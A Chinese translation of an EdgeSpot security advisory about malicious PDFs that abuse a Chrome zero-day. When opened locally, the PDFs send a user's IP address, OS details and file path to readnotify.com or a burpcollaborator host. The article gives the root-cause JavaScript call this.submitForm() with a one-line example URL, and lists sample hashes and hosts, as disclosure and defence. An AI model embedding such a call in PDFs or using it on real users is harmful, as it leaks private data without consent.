有攻击者正利用Chrome的0day漏洞偷取他人信息
总结
自2018年12月底以来,EdgeSpot在公网检测到多个PDF恶意文档,涉及谷歌Chrome的0day漏洞。当受害者在Google Chrome打开恶意PDF文档时,攻击者可窃取到受害者的隐私信息。
细节
EdgeSpot表示,这些恶意PDF文档用Adobe阅读器打开时是“没有问题”的,但是,当它们在Google Chrome上打开时,就会抓取到可疑的流量。
EdgeSpot也探测到了很多恶意样本,并展示了一个已上传到virustotal的恶意样本:
- https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection (首次提交 2017-10-01, 文件名: “honduras-bginfo.pdf”)
EdgeSpot的检测引擎将样本标记为“潜在的0day攻击(Google Chrome)、个人信息泄露”,如下图所示:
当本地恶意文档在Google Chrome中打开时,内容如下:
通过在后台捕捉流量,我们观察到在打开文件时,有可疑的上网流量,某些用户数据会被发送到readnotify.com
。
可疑流量是一个HTTP的Post包,Wireshark捕捉窗口如下所示:
根据这个HTTP数据包的内容,攻击者可能会收集用户的以下信息:
用户的公网IP地址。
OS、Chrome版本等(在POST请求头中)。
用户计算机上恶意PDF文件的完整路径(在上传内容中)。
和之前的恶意PDF文件不同的是,它只会影响谷歌Chrome(阅读本地PDF文档时),而不影响Adobe阅读器。
同时也不能用于NTLM窃取,虽然它会泄漏您的操作系统信息和存储在本地磁盘上的文件绝对路径。
EdgeSpot分析了恶意样本,发现有一些可疑的ja vasc ript代码。
在去除混淆后,发现漏洞的根本原因是this.submitForm()
这个PDF的ja vasc ript接口。经过简单测试,只要this.submitForm('http://google.com/test')
这样简单的调用就可以把隐私信息发送到google.com。
EdgeSpot已向谷歌提交了一份报告,目前谷歌安全团队正在研究中。作为一个临时的“解决方法”,我们建议相关用户使用其他PDF阅读器读取在本地PDF文档,或者在Chrome中打开PDF文档时中断网络连接。
在EdgeSpot向谷歌报告了第一个样本之后,不断地发现越来越多与此漏洞相关的样本。到目前为止,总共发现了两类样本。第一类基本都是将数据发送到readnotify.com
。它们是:
而第二类样本最早出现在2018-09-26,它会把个人信息发送至http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html
最新评论